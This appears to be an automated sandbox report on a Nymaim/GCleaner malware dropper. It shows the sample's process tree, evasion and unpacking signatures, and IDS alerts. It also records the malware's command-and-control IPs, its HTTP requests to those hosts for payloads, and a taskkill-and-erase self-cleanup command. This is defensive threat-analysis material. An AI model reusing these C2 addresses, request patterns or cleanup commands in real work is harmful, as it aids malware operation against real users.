Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	764035
MD5:	f6ef13946619524c0e6bb1c01cfa73fb
SHA1:	e8a59c66c15d4a1681cff18cb8a9750db3da648f
SHA256:	e2224686d59ed32b39689b853a88c3f17720dead31201d8920d4ef5d71ed4eb7
Tags:	exe
Infos:

Detection

Nymaim

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected Nymaim

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Uses taskkill to terminate processes

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to detect sandboxes (foreground window change detection)

Creates a process in suspended mode (likely to inject code)

Classification

×

Process Tree

System is w10x64

file.exe (PID: 5856 cmdline: C:\Users\user\Desktop\file.exe MD5: F6EF13946619524C0E6BB1C01CFA73FB)

is-188R9.tmp (PID: 5832 cmdline: "C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp" /SL4 $402C2 "C:\Users\user\Desktop\file.exe" 2023066 96256 MD5: 2C3832FDF847813369EC960CD39C8265)

ntFolders.exe (PID: 6076 cmdline: "C:\Program Files (x86)\PrintFolders\ntFolders.exe" MD5: E2D8395C6ADC664320DCF1CFC63336F4)

LUxJPTIXtIs.exe (PID: 5216 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)

cmd.exe (PID: 3788 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 588 cmdline: taskkill /im "ntFolders.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.330488356.00000000031D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000002.00000002.329404364.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000002.00000002.330580256.0000000003330000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.ntFolders.exe.400000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.ntFolders.exe.400000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.ntFolders.exe.3330000.3.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.ntFolders.exe.3330000.3.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ETPRO TROJAN GCleaner Downloader - Payload Response - Source IP: 107.182.129.235 - Destination IP: 192.168.2.3

Timestamp:	107.182.129.235192.168.2.380496992852925 12/09/22-10:47:08.950307
SID:	2852925
Source Port:	80
Destination Port:	49699
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN GCleaner Downloader Activity M8 - Source IP: 192.168.2.3 - Destination IP: 45.139.105.171

Timestamp:	192.168.2.345.139.105.17149698802041920 12/09/22-10:47:08.733822
SID:	2041920
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://171.22.30.106/library.php	URL Reputation: Label: malware
Source: http://171.22.30.106/library.phpY	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe

ReversingLabs: Detection: 50%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Joe Sandbox ML: detected

Source: 0.0.file.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.file.exe.1fa8000.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.file.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.2.ntFolders.exe.10000000.6.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: 2.2.ntFolders.exe.400000.0.unpack

Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_10001000 ISCryptGetVersion,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_10001130 ArcFourCrypt,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Unpacked PE file: 2.2.ntFolders.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:

Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-6TIMV.tmp.1.dr

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00451554 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0048A778 FindFirstFileA,6D2D69D0,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00423E2D FindFirstFileExW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_1000959D FindFirstFileExW,

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.3:49698 -> 45.139.105.171:80
Source: Traffic	Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.3:49699

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 45.139.105.1
Source: Malware configuration extractor	IPs: 85.31.46.167
Source: Malware configuration extractor	IPs: 107.182.129.235
Source: Malware configuration extractor	IPs: 171.22.30.106

Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS

Source: Joe Sandbox View

IP Address: 45.139.105.171 45.139.105.171

Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235

Source: ntFolders.exe, 00000002.00000002.330219181.000000000174F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.182.129.235/storage/extension.php
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.182.129.235/storage/ping.php
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.php
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.phpY
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.139.10
Source: ntFolders.exe, 00000002.00000002.330236396.000000000175A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
Source: file.exe	String found in binary or memory: http://www.innosetup.com
Source: is-188R9.tmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, 00000001.00000000.242952411.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/?ps
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/?psU

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe

Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: global traffic	HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache

Source: LUxJPTIXtIs.exe, 00000003.00000002.258694101.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ntFolders.exe.3330000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ntFolders.exe.3330000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.330488356.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.329404364.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.330580256.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004081C8
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00468940
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00460F30
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0043DF70
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004303A4
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0047A6D8
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_004446E8
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00434994
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0045AA90
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00480BDC
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00444C90
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00462F38
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00445388
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00435698
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00445794
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_0042F948
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: 1_2_00457BB4
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_004056A0
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00406800
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00406AA0
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00405F40
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00402F20
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_004150D3
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00415305
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_004223A9
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00419510
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00404840
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00426850
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00410A50
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0042AB9A
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00421C88
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_0042ACBA
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00447D2D
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00428D39
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_00404F20
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_1000F670
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe	Code function: 2_2_1000EC61

Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00403548 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00407B08 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00445FF4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00455A04 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00405AA4 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00455814 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 004462C4 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 004348AC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00451AFC appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp	Code function: String function: 00408DF0 appears 42 times
